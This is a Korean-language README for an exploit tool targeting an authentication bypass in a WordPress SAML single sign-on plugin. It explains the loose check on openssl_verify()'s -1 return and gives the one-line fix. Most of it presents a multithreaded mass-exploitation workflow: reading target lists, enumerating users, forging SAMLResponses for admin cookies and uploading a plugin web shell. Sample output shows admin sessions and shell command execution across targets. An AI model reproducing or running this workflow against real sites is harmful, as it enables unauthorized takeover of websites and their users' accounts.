
SAML Single Sign On <= 5.4.4 - SAMLResponse 매개변수를 통한 인증되지 않은 인증 우회
SAML Single Sign On <= 5.4.4 - SAMLResponse 매개변수를 통한 인증되지 않은 인증 우회
개념 증명 (Proof-of-Concept) 익스플로잇
잘못된 서명 → `openssl_verify()`가 `-1` 반환 → PHP 느슨한 형변환으로 `true` 처리 → Administrator 권한으로 `wp_set_auth_cookie()` 호출
| 필드 | 세부 정보 |
|---|---|
| CVE ID | CVE-2026-15981 |
| 영향받는 플러그인 | miniOrange SAML 2.0 Single Sign On – SSO Login (WordPress) |
| 영향받는 버전 | 5.4.4를 포함한 모든 버전 |
| 유형 | 인증되지 않은 인증 우회 (Unauthenticated Authentication Bypass) |
| CWE | CWE-287: 부적절한 인증 (Improper Authentication) / CWE-305: 주요 약점으로 인한 인증 우회 (Authentication Bypass by Primary Weakness) |
| CVSS 3.1 | 9.8 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 인증 | 필요 없음 |
WordPress용 SAML Single Sign On – SSO Login 플러그인은 5.4.4를 포함한 모든 버전에서 인증 우회(Authentication Bypass) 취약점에 노출됩니다. 이는 mo_saml_validate_signature() 함수가 PHP의 openssl_verify()가 반환하는 원시 3-상태(tri-state) 정수에 대해 **느슨한 부울 검사(loose boolean check)**를 수행하기 때문이며, 오류 반환 값인 -1이 truthy로 평가되어 서명 검증이 성공한 것으로 처리됩니다.
이로 인해 인증되지 않은 공격자는 공격자가 제어하는 NameID와 의도적으로 손상된(malformed) 서명 값을 포함한 조작된 SAMLResponse를 제출하여 OpenSSL 처리 오류를 유발함으로써 관리자를 포함한 모든 기존 WordPress 사용자로 로그인할 수 있습니다. 검증을 완전히 우회하여 대상 계정에 대해 wp_set_auth_cookie()가 호출되도록 하는 것입니다.
Attacker sends crafted SAMLResponse
│
▼
mo_saml_validate_signature()
│
▼
openssl_verify($data, $malformed_sig, $key)
│
├─ Returns 1 → valid signature ✓
├─ Returns 0 → invalid signature ✗
└─ Returns -1 → OpenSSL internal error
│
▼
PHP loose comparison: if ($result)
│
├─ (int) 1 → true ✓
├─ (int) 0 → false ✓
└─ (int) -1 → true ← BUG: error treated as success
│
▼
wp_set_auth_cookie() called
│
▼
Attacker is now Administrator
수정은 사소합니다 — if ($result) 대신 if ($result === 1)을 사용하면 됩니다 — 하지만 이 결함이 미치는 영향은 완전한 인증 우회입니다.
?option=mosaml_metadata에서 Entity ID 및 ACS URL 추출/wp-json/wp/v2/users)/?author=N)?option=saml_user_login 리다이렉트를 추적하여 IdP 기본 URL 추출lxml을 통한 올바른 Exclusive C14N 정규화</Issuer> 다음에 서명 요소 주입openssl_verify() = -1을 유발하도록 설계된 12개 이상의 손상된 서명 페이로드wordpress_logged_in_* 쿠키 확인/wp-admin/, /wp-admin/users.php, /wp-admin/plugins.php 접근 검증/wp-admin/profile.php에서 사용자 이름 및 이메일 읽기plugin-install.php를 통한 플러그인 ZIP 업로드/wp-json/wp/v2/plugins를 통한 REST API 플러그인 업로드Nx-zD 서명 확인Python >= 3.8
pip install requests lxml
SAML Assertion의 올바른 Exclusive C14N 정규화를 위해서는
lxml이 필수입니다.
python CVE-2026-15981.py
다음을 입력하라는 메시지가 표시됩니다:
| 프롬프트 | 설명 | 기본값 |
|---|---|---|
| 대상 파일 | 한 줄에 대상 하나씩 포함된 텍스트 파일 경로 | list.txt |
| 스레드 | 동시 작업자 수 (1–100) | 5 |
https://example.com
http://target.org
subdomain.example.net
192.168.1.100
https://example.com/wordpress
한 줄에 하나의 URL을 입력합니다. 스킴(scheme)이 지정되지 않은 경우 기본적으로 HTTP가 사용됩니다.
███████╗███╗ ███╗███████╗
██╔════╝████╗ ████║██╔════╝
███████╗██╔████╔██║███████╗
╚════██║██║╚██╔╝██║╚════██║
███████║██║ ╚═╝ ██║███████║
╚══════╝╚═╝ ╚═╝╚══════╝
╔══════════════════════════════════════════════════════════╗
║ miniOrange SAML SSO <= 5.4.4 ║
║ openssl_verify() -1 Bypass -> Admin Session ║
╚══════════════════════════════════════════════════════════╝
By: Nxploited ( Khaled Alenazi ) - Nxploited ZeroDay Hub
T.m @Kxploit
각 대상은 7개의 라벨이 지정된 단계로 진행됩니다:
============================================================
target.com
============================================================
[1] WordPress
confirmed
[2] SAML plugin
version: 5.4.4
miniOrange SAML detected
[3] SP metadata
metadata entityID: https://target.com/...
metadata ACS: https://target.com/
[4] Users
REST: admin (id=1)
REST: editor (id=2)
author/3: johndoe
4 found: ['admin', 'editor', 'johndoe', 'target']
[5] Issuers
SSO redirect found
3 candidates
[6] Exploit
COOKIE! #14 user=admin 0xFF*256/rsa-sha256
wordpress_logged_in_abc123=admin%7C1753...
wp-admin accessible
user=admin [email protected]
users.php -> Admin
[7] Shell upload
M1: plugin uploaded
SHELL (M1-plugin): https://target.com/wp-content/plugins/nxproof/Nx.php
-> Nx-zD Linux target 6.1.0 x86_64 uid=33(www-data) ...
+==========================================================+
| ADMIN SESSION CONFIRMED |
+==========================================================+
| Target : https://target.com
| User : admin
| Issuer : https://idp.example.com/simplesaml/...
| Method : 0xFF*256/rsa-sha256
| Cookie : wordpress_logged_in_abc123=admin%7C1753...
| Shell : https://target.com/wp-content/plugins/nxproof/Nx.php
+==========================================================+
| 파일 | 내용 |
|---|---|
sms.txt | 확인된 관리자 세션당 한 줄 — 타임스탬프, 대상, 사용자, 쿠키, 셸 URL, 발급자, 서명 방법 |
sms_debug.json | 모든 대상에 대한 전체 진단 JSON — 시도 횟수 및 실패 분류 포함 |
[2026-07-26 09:14:52] https://target.com | ADMIN | user=admin | cookie=wordpress_logged_in_...
| SHELL=https://target.com/wp-content/plugins/nxproof/Nx.php | issuer=https://idp.example.com/...
| sig=0xFF*256/rsa-sha256
============================================================
DONE - 142.3s
============================================================
ADMIN=3 miss=47 skip=100
results -> sms.txt debug -> sms_debug.json
============================================================